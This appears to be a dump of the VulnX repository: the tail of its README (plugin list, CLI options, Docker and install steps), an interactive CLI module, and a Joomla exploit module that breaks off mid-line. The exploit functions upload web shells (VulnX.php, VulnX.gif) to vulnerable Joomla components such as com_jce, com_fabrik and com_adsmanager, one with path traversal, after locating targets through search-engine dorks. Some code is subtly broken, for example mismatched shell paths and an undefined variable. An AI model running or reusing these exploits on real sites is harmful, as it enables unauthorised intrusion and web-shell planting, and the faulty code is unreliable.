]('#') 130 | - [x] [pk_vertflexmenu ]('#') 131 | - [x] [nvn_export_orders ]('#') 132 | - [x] [megamenu ]('#') 133 | - [x] [tdpsthemeoptionpanel ]('#') 134 | - [ ] [psmodthemeoptionpanel]('#') 135 | - [x] [masseditproduct ]('#') 136 | - [ ] [blocktestimonial ]('#') 137 | - [x] [soopabanners ]('#') 138 | - [x] [Vtermslideshow ]('#') 139 | - [x] [simpleslideshow ]('#') 140 | - [x] [productpageadverts ]('#') 141 | - [x] [homepageadvertise ]('#') 142 | - [ ] [homepageadvertise2 ]('#') 143 | - [x] [jro_homepageadvertise]('#') 144 | - [x] [advancedslider ]('#') 145 | - [x] [cartabandonmentpro ]('#') 146 | - [x] [cartabandonmentproOld]('#') 147 | - [x] [videostab ]('#') 148 | - [x] [wg24themeadministration]('#') 149 | - [x] [fieldvmegamenu ]('#') 150 | - [x] [wdoptionpanel ]('#') 151 | 152 | ##### Opencart 153 | - [ ] [Opencart BruteForce]('#') 154 | 155 | 156 | ------------------------------------- 157 | 158 | ### _🕷️ VulnxMode_ 159 | `NEW` 160 | vulnx now have an interactive mode. 161 | ***URLSET*** 162 | 163 | ![vulnxmode_url](https://user-images.githubusercontent.com/23563528/68983791-fddd7400-080c-11ea-8e2b-c463a2c8f8c5.png) 164 | 165 | ***DORKSET*** 166 | 167 | ![vulnxmode_dorks](https://user-images.githubusercontent.com/23563528/68985825-bf01eb00-0819-11ea-83ea-3db022b1d645.png) 168 | 169 | ------------------------------------- 170 | 171 | 172 | 173 | ### _🕷️ Available command line options_ 174 | [`READ VULNX WIKI`](https://github.com/anouarbensaad/vulnx/wiki/Usage) 175 | 176 | usage: vulnx [options] 177 | 178 | -u --url url target 179 | -D --dorks search webs with dorks 180 | -o --output specify output directory 181 | -t --timeout http requests timeout 182 | -c --cms-info search cms info[themes,plugins,user,version..] 183 | -e --exploit searching vulnerability & run exploits 184 | -w --web-info web informations gathering 185 | -d --domain-info subdomains informations gathering 186 | -l, --dork-list list names of dorks exploits 187 | -n, --number-page number page of search engine(Google) 188 | -p, --ports ports to scan 189 | -i, --input specify domains to scan from an input file 190 | --threads number of threads 191 | --dns dns informations gathering 192 | 193 | ------------------------------------- 194 | 195 | ### _🕷️ Docker_ 196 | 197 | VulnX in DOCKER !!. 198 | 199 | ```bash 200 | $ git clone https://github.com/anouarbensaad/VulnX.git 201 | $ cd VulnX 202 | $ docker build -t vulnx ./docker/ 203 | $ docker run -it --name vulnx vulnx:latest -u http://example.com 204 | ``` 205 | 206 | run vulnx container in interactive mode 207 | 208 | 209 | ![vokoscreen-2019-06-23_11-53-20](https://user-images.githubusercontent.com/23563528/59975226-a31d5480-95ad-11e9-8252-ddd8291cbee4.gif) 210 | 211 | 212 | to view logfiles mount it in a volume like so: 213 | 214 | ```bash 215 | $ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com 216 | ``` 217 | 218 | change the [mounting directory](https://github.com/anouarbensaad/vulnx/blob/master/docker/Dockerfile#L46).. 219 | 220 | ```Dockerfile 221 | VOLUME [ "$PATH" ] 222 | ``` 223 | 224 | ------------------------------------- 225 | 226 | ### _🕷️ Install vulnx on Ubuntu_ 227 | 228 | 229 | ```bash 230 | $ git clone https://github.com/anouarbensaad/vulnx.git 231 | $ cd VulnX 232 | $ chmod +x install.sh 233 | $ ./install.sh 234 | ``` 235 | Now run `vulnx` 236 | 237 | ![vokoscreen-2019-07-05_03-59-48](https://user-images.githubusercontent.com/23563528/60695392-7a645b80-9ed9-11e9-94fb-f6025594a9e3.gif) 238 | 239 | 240 | ### _🕷️ Install vulnx on Termux_ 241 | 242 | ```BASH 243 | $ pkg update 244 | $ pkg install -y git 245 | $ git clone http://github.com/anouarbensaad/vulnx 246 | $ cd vulnx 247 | $ chmod +x install.sh 248 | $ ./install.sh 249 | ``` 250 | [**CLICK HERE TO SHOW THE RESULT**](https://user-images.githubusercontent.com/23563528/58364091-98847800-7ea6-11e9-9a9a-c27717e4dda1.png) 251 | 252 | 253 | ### _🕷️ Install vulnx in Windows_ 254 | 255 | - [click here](https://github.com/anouarbensaad/vulnx/archive/master.zip) to download vulnx 256 | - download and install python3 257 | - unzip **vulnx-master.zip** in ***c:/*** 258 | - open the command prompt **cmd**. 259 | ``` 260 | > cd c:/vulnx-master 261 | > python vulnx.py 262 | ``` 263 | 264 | ------------------------------------- 265 | 266 | ##### example command with options : settimeout=3 , cms-gathering = all , -d subdomains-gathering , run --exploits 267 | `vulnx -u http://example.com --timeout 3 -c all -d -w --exploit` 268 | 269 | ##### example command for searching dorks : -D or --dorks , -l --list-dorks 270 | `vulnx --list-dorks` 271 | return table of exploits name. 272 | `vulnx -D blaze` 273 | return urls found with blaze dork 274 | 275 | ------------------------------------- 276 | 277 | ### _🕷️ Versions_ 278 | - [v1.9](https://github.com/anouarbensaad/vulnx/releases/tag/v1.9) 279 | - [v1.8](https://github.com/anouarbensaad/vulnx/releases/tag/v1.8) 280 | - [v1.7](https://github.com/anouarbensaad/vulnx/releases/tag/v1.7) 281 | - [v1.6](https://github.com/anouarbensaad/vulnx/releases/tag/v1.6) 282 | - [v1.5](https://github.com/anouarbensaad/vulnx/releases/tag/v1.5) 283 | - [v1.4](https://github.com/anouarbensaad/vulnx/releases/tag/v1.4) 284 | - [v1.3](https://github.com/anouarbensaad/vulnx/releases/tag/v1.3) 285 | - [v1.2](https://github.com/anouarbensaad/vulnx/releases/tag/v1.2) 286 | - [v1.1](https://github.com/anouarbensaad/vulnx/releases/tag/v1.1) 287 | 288 | ------------------------------------- 289 | 290 | ### :warning: Warning! 291 | 292 | ***I Am Not Responsible of any Illegal Use*** 293 | 294 | ------------------------------------- 295 | 296 | ### _🕷️ Contribution & License_ 297 | 298 | You can contribute in following ways: 299 | 300 | - [Report bugs & add issues](https://github.com/anouarbensaad/VulnX/issues/new) 301 | - Search for new vulnerability 302 | - Develop plugins 303 | - Searching Exploits 304 | - Give suggestions **(Ideas)** to make it better 305 | 306 | Do you want to have a conversation in private? email me : Bensaad.tig@gmail.com 307 | 308 | ***VulnX*** is licensed under [GPL-3.0 License](https://github.com/anouarbensaad/VulnX/blob/master/LICENSE) 309 | -------------------------------------------------------------------------------- /modules/cli/cli.py: -------------------------------------------------------------------------------- 1 | 2 | import sys 3 | 4 | import time 5 | import os 6 | import re 7 | import readline 8 | import glob 9 | import subprocess 10 | from common.colors import end, W, R, B, bannerblue2 11 | from common.banner import banner 12 | from common.requestUp import random_UserAgent 13 | from common.uriParser import parsing_url 14 | from modules.cli.helpers import Helpers 15 | from modules.dorks.engine import Dork 16 | from modules.detector import CMS 17 | 18 | url_regx = re.compile(r'^set url .+') 19 | dork_regx = re.compile(r'^dork') 20 | exec_regx = re.compile(r'^exec .+') 21 | help_regx = re.compile(r'^help') 22 | history_regx = re.compile(r'^history') 23 | exit_regx = re.compile(r'^exit') 24 | cls_regx = re.compile(r'^clear') 25 | var_regx = re.compile(r'^variable') 26 | back_regx = re.compile(r'^back') 27 | run_regx = re.compile(r'^run') 28 | output = re.compile(r'^output \w+$') 29 | page = re.compile(r'^page \d+$') 30 | dorkname_regx = re.compile(r'^set dork .+') 31 | list_regx = re.compile(r'^list') 32 | 33 | W_UL = "\033[4m" 34 | RED_U = '\033[1;1;91m' 35 | man_gloabal = ["help", "clear", "use", "info", "set", "variables", "history", "exec", "dork"] 36 | man_dork = ["help", "list", "set dork", "clear", "history", "variables", "exec", "back"] 37 | man_setdork = ["help", "output", "page", "run", "clear", "exec", "history", "variables", "back"] 38 | man_dorkpage = ["help", "output", "run", "clear", "exec", "history", "variables", "back"] 39 | man_dorkoutput = ["help", "page", "run", "clear", "exec", "history", "variables", "back"] 40 | man_dorkpage_output = [ "help", "run", "clear", "exec", "history", "variables", "back" ] 41 | history=[] 42 | 43 | # VARIABLE 44 | numberpage = 1 # default page−dork variable 45 | output_dir = 'logs' # default output−dork 46 | dorkname = '' 47 | url = '' 48 | timeout = '' 49 | 50 | headers = { 51 | 'host': 'google.com', 52 | 'User-Agent': random_UserAgent(), 53 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 54 | 'Accept-Language': 'en-US,en;q=0.5', 55 | 'Connection': 'keep-alive', } 56 | 57 | class CLI(): 58 | 59 | def __init__(self,headers=None): 60 | self.headers = headers 61 | 62 | def run_exploits(self,url,headers): 63 | cms = CMS(url=url,headers=headers,exploit=True) 64 | cms.instanciate() 65 | 66 | def dork_variable(self,dorkname, output, page): 67 | print(""" 68 | VARIABLE VALUE 69 | -------- ----- 70 | dorkname %s 71 | output %s 72 | pages %s 73 | 74 | """ % (dorkname, output, page)) 75 | 76 | def url_variable(self,url, timeout): 77 | print(""" 78 | VARIABLE VALUE 79 | -------- ----- 80 | url %s 81 | timeout %s 82 | 83 | """ % (url, timeout)) 84 | 85 | def global_variables(self,dorkname, output, page, url, timeout): 86 | print(""" 87 | VARIABLE VALUE 88 | -------- ----- 89 | url %s 90 | timeout %s 91 | dorkname %s 92 | output %s 93 | pages %s 94 | 95 | """ % (dorkname, output, page, url, timeout)) 96 | 97 | def __clearscreen__(self): 98 | return os.system('clear') 99 | 100 | def createListCompleter(self, ll): 101 | def listCompleter(text, state): 102 | line = readline.get_line_buffer() 103 | if not line: 104 | return [c + " " for c in ll][state] 105 | else: 106 | return [c + " " for c in ll if c.startswith(line)][state] 107 | self.listCompleter = listCompleter 108 | 109 | def autocompleter(self,manual): 110 | self.createListCompleter(manual) 111 | readline.set_completer_delims('\t') 112 | readline.parse_and_bind("tab: complete") 113 | readline.set_completer(self.listCompleter) 114 | 115 | def _exec(self,cmd): 116 | regx = r'^exec (.+)' 117 | try: 118 | command = re.search(re.compile(regx), cmd).group(1) 119 | except AttributeError: # No match is found 120 | command = re.search(re.compile(regx), cmd) 121 | if command: 122 | return os.system(command) 123 | 124 | def get_dork(self,pattern): 125 | dork_search = r'^set dork (.+)' 126 | try: 127 | dork = re.search(re.compile(dork_search), pattern).group(1) 128 | except AttributeError: # No match is found 129 | dork = re.search(re.compile(dork_search), pattern) 130 | if dork: 131 | return dork 132 | 133 | def set_page(self,page): 134 | page_search = r'^page (\d+$)' 135 | try: 136 | page = re.search(re.compile(page_search), page).group(1) 137 | except AttributeError: # No match is found 138 | page = re.search(re.compile(page_search), page) 139 | if page: 140 | return int(page) 141 | 142 | def set_output(self,directory): 143 | output = r'^output (\w+$)' 144 | try: 145 | rep = re.search(re.compile(output), directory).group(1) 146 | except AttributeError: # No match is found 147 | rep = re.search(re.compile(output), directory) 148 | if rep: 149 | return rep 150 | 151 | def get_url(self, pattern): 152 | url_search = r'^set url (.+)' 153 | try: 154 | url = re.search(re.compile(url_search), pattern).group(1) 155 | except AttributeError: # No match is found 156 | url = re.search(re.compile(url_search), pattern) 157 | if url: 158 | return url # ParseURL(url) 159 | 160 | def cli_dork(self,interepter): 161 | helpers = Helpers() 162 | 163 | while True: 164 | 165 | self.autocompleter(man_dork) 166 | cmd_interpreter = input("{0}{1}vulnx{2}{3} ({4}Dorks{5})>> {6}" .format(bannerblue2, W_UL, end, W, B, W, end)) 167 | history.append(cmd_interpreter) 168 | if back_regx.search(cmd_interpreter): 169 | break 170 | if list_regx.search(cmd_interpreter): 171 | print('\n{0}[*]{1} Listing dorks name..' .format (B, end)) 172 | if cls_regx.search(cmd_interpreter) or cmd_interpreter == 'cls': 173 | self.__clearscreen__() 174 | if exit_regx.search(cmd_interpreter) or cmd_interpreter == 'quit': 175 | sys.exit() 176 | if help_regx.search(cmd_interpreter) or cmd_interpreter == '?': 177 | helpers._dorks_action_help() 178 | 179 | if history_regx.search(cmd_interpreter): 180 | for i in range(len(history)): 181 | print(" {0} {1}" .format(i+1, history[i-1])) 182 | if exec_regx.search(cmd_interpreter): 183 | self._exec(cmd_interpreter) 184 | if var_regx.search(cmd_interpreter): 185 | self.dork_variable(dorkname, output_dir, numberpage) 186 | if dorkname_regx.search(cmd_interpreter): 187 | 188 | while True: 189 | 190 | self.autocompleter(man_setdork) 191 | cmd_interpreter_wp = input("{0}{1}vulnx{2}{3} ({4}Dorks-{5}{6})>> {7}" .format (bannerblue2, W_UL, end, W, B, self.get_dork(cmd_interpreter), W, end)) 192 | history.append(cmd_interpreter_wp) 193 | '''SET PAGE VARIABLE.''' 194 | 195 | if page.search(cmd_interpreter_wp): 196 | 197 | while True: 198 | 199 | self.autocompleter(man_dorkpage) 200 | cmd_interpreter_wp_page = input("{0}{1}vulnx{2}{3} ({4}Dorks-{5}-{6}{7})>> {8}" .format ( 201 | bannerblue2, W_UL, end, W, B, self.get_dork(cmd_interpreter), self.set_page(cmd_interpreter_wp), W, end)) 202 | history.append(cmd_interpreter_wp_page) 203 | if output.search(cmd_interpreter_wp_page): 204 | while True: 205 | self.autocompleter(man_dorkoutput) 206 | cmd_interpreter_wp_page_output = input("{0}{1}vulnx{2}{3} ({4}Dorks-{5}-{6}{7})>> {8}" .format ( 207 | bannerblue2, W_UL, end, W, B, self.get_dork(cmd_interpreter), self.set_page(cmd_interpreter_wp), W, end)) 208 | history.append(cmd_interpreter_wp_page_output) 209 | 210 | if run_regx.search(cmd_interpreter_wp_page_output): 211 | print('\n') 212 | DEngine = Dork(exploit=self.get_dork(cmd_interpreter),headers=self.headers,pages=self.set_page(cmd_interpreter_wp)) 213 | DEngine.search() 214 | if run_regx.search(cmd_interpreter_wp_page_output): 215 | print('\n') 216 | if back_regx.search(cmd_interpreter_wp_page_output): 217 | break 218 | if help_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output == '?': 219 | helpers._dorks_setdork_page_output_help() 220 | if cls_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output == 'cls': 221 | self.__clearscreen__() 222 | if exit_regx.search(cmd_interpreter_wp_page_output) or cmd_interpreter_wp_page_output == 'quit': 223 | sys.exit() 224 | if history_regx.search(cmd_interpreter_wp_page_output): 225 | for i in range(len(history)): 226 | print(" {0} {1}" .format(i+1, history[i-1])) 227 | if exec_regx.search(cmd_interpreter_wp_page_output): 228 | self._exec( 229 | cmd_interpreter_wp_page_output) 230 | 231 | 232 | 233 | if run_regx.search(cmd_interpreter_wp_page): 234 | print('\n') 235 | DEngine = Dork(exploit=self.get_dork(cmd_interpreter),headers=self.headers,pages=self.set_page(cmd_interpreter_wp)) 236 | DEngine.search() 237 | if run_regx.search(cmd_interpreter_wp_page): 238 | print('\n') 239 | if back_regx.search(cmd_interpreter_wp_page): 240 | break 241 | if help_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page == '?': 242 | Helpers._dorks_setdork_page_help() 243 | if cls_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page == 'cls': 244 | self.__clearscreen__() 245 | if exit_regx.search(cmd_interpreter_wp_page) or cmd_interpreter_wp_page == 'quit': 246 | sys.exit() 247 | if history_regx.search(cmd_interpreter_wp_page): 248 | for i in range(len(history)): 249 | print(" {0} {1}" .format(i+1, history[i-1])) 250 | if exec_regx.search(cmd_interpreter_wp_page): 251 | self._exec(cmd_interpreter_wp_page) 252 | if var_regx.search(cmd_interpreter_wp_page): 253 | self.dork_variable(self.get_dork(cmd_interpreter), output_dir, self.set_page(cmd_interpreter_wp)) 254 | 255 | 256 | def general(self,cmd): 257 | while True: 258 | self.autocompleter(man_gloabal) 259 | cmd = input("%s%svulnx%s > " % (bannerblue2, W_UL, end)) 260 | history.append(cmd) 261 | if url_regx.search(cmd): 262 | # url session 263 | while True: 264 | cmd_interpreter = input("%s%svulnx%s%s target(%s%s%s) > %s" % ( 265 | bannerblue2, W_UL, end, W, R, self.get_url(cmd), W, end)) 266 | history.append(cmd_interpreter) 267 | if cmd_interpreter == 'back': 268 | break 269 | elif cmd_interpreter == 'run exploit': 270 | print('\n%s[*]%s Running exploits..' % (B, end)) 271 | root = self.get_url(cmd) 272 | if root.startswith('http'): 273 | url_root = root 274 | else: 275 | url_root = 'http://'+url_root 276 | self.run_exploits(url_root,self.headers) 277 | elif help_regx.search(cmd_interpreter) or cmd_interpreter == '?': 278 | Helpers._url_action_help() 279 | elif exit_regx.search(cmd_interpreter) or cmd_interpreter == 'quit': 280 | sys.exit() 281 | else: 282 | print("use (help) (?) to show man commands.") 283 | elif dork_regx.search(cmd): 284 | # dork session 285 | self.cli_dork(cmd) 286 | elif exit_regx.search(cmd) or cmd == 'quit': 287 | sys.exit() 288 | elif help_regx.search(cmd) or cmd == '?': 289 | Helpers._general_help() 290 | elif cls_regx.search(cmd) or cmd == 'cls': 291 | self.__clearscreen__() 292 | elif history_regx.search(cmd): 293 | for i in range(len(history)): 294 | print(" %s %s" % (i+1, history[i-1])) 295 | elif exec_regx.search(cmd): 296 | self._exec(cmd) 297 | elif var_regx.search(cmd): 298 | self.global_variables(dorkname, output_dir, 299 | numberpage, url, timeout) 300 | else: 301 | print("use (help) (?) to show man commands.") 302 | 303 | -------------------------------------------------------------------------------- /modules/exploits/joomla_exploits.py: -------------------------------------------------------------------------------- 1 | import re 2 | import random 3 | import datetime 4 | import requests 5 | now = datetime.datetime.now() 6 | year = now.strftime('%Y') 7 | month= now.strftime('%m') 8 | 9 | import os 10 | from common.colors import failexploit , vulnexploit , que , info , good ,run,W 11 | 12 | class JOOExploits(object): 13 | 14 | def __init__(self, url, headers): 15 | self.url = url 16 | self.headers = headers 17 | 18 | def com_jce(self): 19 | self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 20 | endpoint = self.url+"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20" 21 | data = { 22 | 'upload-dir':'./../../', 23 | 'upload-overwrite':0, 24 | 'Filedata' : [open('shell/VulnX.gif','rb')], 25 | 'action':'Upload', 26 | } 27 | requests.post(endpoint, data=data, headers=self.headers,verify=False).text 28 | dump_data = self.url + "/VulnX.gif" 29 | res=requests.get(dump_data, self.headers).text 30 | matches = re.findall(re.compile(r'/image/gif/'),res) 31 | if matches: 32 | return dict( 33 | url=self.url, 34 | name="com_jce", 35 | status=True, 36 | shell=dump_data 37 | ) 38 | else: 39 | return dict( 40 | url=self.url, 41 | name="com_jce", 42 | status=False 43 | ) 44 | 45 | def com_media(self): 46 | self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 47 | endpoint = self.url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" 48 | self.headers={"content-type":["form-data"]} 49 | fieldname = 'Filedata[]' 50 | shell = open('shell/VulnX.txt','rb') 51 | data = { 52 | fieldname:shell, 53 | } 54 | requests.post(endpoint, data=data, headers=self.headers,verify=False).text 55 | dump_data = endpoint+"/images/XAttacker.txt" 56 | response = requests.get(dump_data,self.headers,verify=False).text 57 | if re.findall(r'Tig', response): 58 | return dict( 59 | url=self.url, 60 | name="com_media", 61 | status=True, 62 | shell=dump_data 63 | ) 64 | else: 65 | return dict( 66 | url=self.url, 67 | name="com_media", 68 | status=False 69 | ) 70 | 71 | 72 | #def com_jdownloads(self): 73 | # endpoint = self.url+"index.php?option=com_jdownloads&Itemid=0&view=upload" 74 | # files = open('shell/VulnX.zip','rb') 75 | # shell = open('shell/VulnX.gif','rb') 76 | # data = { 77 | # 'name' : 'Tig', 78 | # 'mail' :'tig@tig.com', 79 | # 'filetitle' :'Tig', 80 | # 'catlist':'1', 81 | # 'license':'0', 82 | # 'language':'0', 83 | # 'system':'0', 84 | # 'file_upload': files, 85 | # 'pic_upload':shell, 86 | # 'description':'

zot

', 87 | # 'senden':'Send file', 88 | # 'option':'com_jdownloads', 89 | # 'view':'upload', 90 | # 'send':'1', 91 | # '24c22896d6fe6977b731543b3e44c22f':'1', 92 | # } 93 | # requests.post(endpoint, options, self.headers).text 94 | # dump_data = endpoint+"/images/jdownloads/screenshots/VulnX.gif?Vuln=X" 95 | # response = requests.get(dump_data).text 96 | # if re.findall(r'Vuln X', response): 97 | # print (' %s com_jdownloads %s %s' %(que,vulnexploit,dump_data)) 98 | # else: 99 | # print (' %s com_jdownloads %s' %(que , failexploit)) 100 | 101 | #def com_jdownloadsb(self): 102 | # self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 103 | # endpoint = self.url+"/images/jdownloads/screenshots/VulnX.php" 104 | # self.headers={"content-type":["form-data"]} 105 | # files = open('shell/VulnX.zip','rb') 106 | # shell = open('shell/VulnX.gif','rb') 107 | # data = { 108 | # 'name' : 'Tig', 109 | # 'mail' :'tig@tig.com', 110 | # 'filetitle' :'Tig', 111 | # 'catlist':'1', 112 | # 'license':'0', 113 | # 'language':'0', 114 | # 'system':'0', 115 | # 'file_upload': files, 116 | # 'pic_upload':shell, 117 | # 'description':'

zot

', 118 | # 'senden':'Send file', 119 | # 'option':'com_jdownloads', 120 | # 'view':'upload', 121 | # 'send':'1', 122 | # '24c22896d6fe6977b731543b3e44c22f':'1' 123 | # } 124 | # response = requests.get(endpoint,self.headers).text 125 | # if re.findall(r'200', response): 126 | # print (' %s com_jdownloads2 %s %s' %(que,vulnexploit,endpoint)) 127 | # else: 128 | # print (' %s com_jdownloads2 %s' %(que , failexploit)) 129 | 130 | def com_fabrika(self): 131 | self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 132 | endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 133 | 134 | self.headers={"content-type":["form-data"]} 135 | fieldname = 'file' 136 | shell = open('shell/VulnX.php','rb') 137 | data = { 138 | fieldname:shell, 139 | } 140 | requests.post(endpoint, data=data, headers=self.headers).text 141 | dump_data = endpoint+"/images/XAttacker.txt" 142 | response = requests.get(dump_data,self.headers,verify=False).text 143 | if re.findall(r'Vuln X', response): 144 | return dict( 145 | url=self.url, 146 | name="com_fabrika", 147 | status=True, 148 | shell=dump_data 149 | ) 150 | else: 151 | return dict( 152 | url=self.url, 153 | name="com_fabrika", 154 | status=False 155 | ) 156 | 157 | def com_fabrikb(self): 158 | self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 159 | endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 160 | 161 | self.headers={"content-type":["form-data"]} 162 | fieldname = 'file' 163 | shell = open('shell/VulnX.txt','rb') 164 | data = { 165 | fieldname:shell, 166 | } 167 | requests.post(endpoint, data=data, headers=self.headers,verify=False).text 168 | dump_data = endpoint+"/images/XAttacker.txt" 169 | response = requests.get(dump_data,self.headers,verify=False).text 170 | if re.findall(r'Tig', response): 171 | return dict( 172 | url=self.url, 173 | name="com_fabrik2", 174 | status=True, 175 | shell=dump_data 176 | ) 177 | else: 178 | return dict( 179 | url=self.url, 180 | name="com_fabrik2", 181 | status=False 182 | ) 183 | 184 | def com_foxcontact(self): 185 | self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 186 | # foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php', 187 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php', 188 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php', 189 | # 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'} 190 | endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 191 | 192 | self.headers={"content-type":["form-data"]} 193 | fieldname = 'file' 194 | shell = open('shell/VulnX.txt','rb') 195 | data = { 196 | fieldname:shell, 197 | } 198 | requests.post(endpoint, data=data, headers=self.headers,verify=False).text 199 | dump_data = endpoint+"/images/XAttacker.txt" 200 | response = requests.get(dump_data,self.headers).text 201 | if re.findall(r'Tig', response): 202 | return dict( 203 | url=self.url, 204 | name="com_foxcontact", 205 | status=True, 206 | shell=dump_data 207 | ) 208 | else: 209 | return dict( 210 | url=self.url, 211 | name="com_foxcontact", 212 | status=False 213 | ) 214 | 215 | def com_adsmanager(self): 216 | endpoint = self.url + "/index.php?option=com_adsmanager&task=upload&tmpl=component" 217 | img = open('shell/VulnX.php', 'rb') 218 | name_img= os.path.basename('shell/VulnX.html') 219 | files= {'image': (name_img,img,'form-data',{'Expires': '0'}) } 220 | requests.post(endpoint,files=files ,headers=self.headers,verify=False) 221 | shellup = self.url + "/tmp/plupload/VulnX.html" 222 | checkShell = requests.get(shellup).text 223 | statusCheck = re.findall(re.compile(r'VulnX'),checkShell) 224 | if statusCheck: 225 | return dict( 226 | url=self.url, 227 | name="com_adsmanager", 228 | status=True, 229 | shell=shellup 230 | ) 231 | else: 232 | return dict( 233 | url=self.url, 234 | name="com_adsmanager", 235 | status=False 236 | ) 237 | 238 | def com_blog(self): 239 | endpoint = self.url + "/index.php?option=com_myblog&task=ajaxupload" 240 | checkShell = requests.get(endpoint,headers=self.headers,verify=False).text 241 | statusCheck = re.findall(re.compile(r'has been uploaded'),checkShell) 242 | if statusCheck: 243 | return dict( 244 | url=self.url, 245 | name="com_blog", 246 | status=True, 247 | shell='' 248 | ) 249 | else: 250 | return dict( 251 | url=self.url, 252 | name="com_blog", 253 | status=False 254 | ) 255 | 256 | def com_users(self): 257 | endpoint = self.url + "/index.php?option=com_users&view=registration" 258 | checkShell = requests.get(endpoint,headers=self.headers,verify=False).text 259 | statusCheck = re.findall(re.compile(r'jform_email2-lbl'),checkShell) 260 | if statusCheck: 261 | return dict( 262 | url=self.url, 263 | name="com_users", 264 | status=True, 265 | shell='' 266 | ) 267 | else: 268 | return dict( 269 | url=self.url, 270 | name="com_users", 271 | status=False 272 | ) 273 | 274 | def comweblinks(self): 275 | endpoint = self.url + "/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=" 276 | token = re.findall(re.compile(r'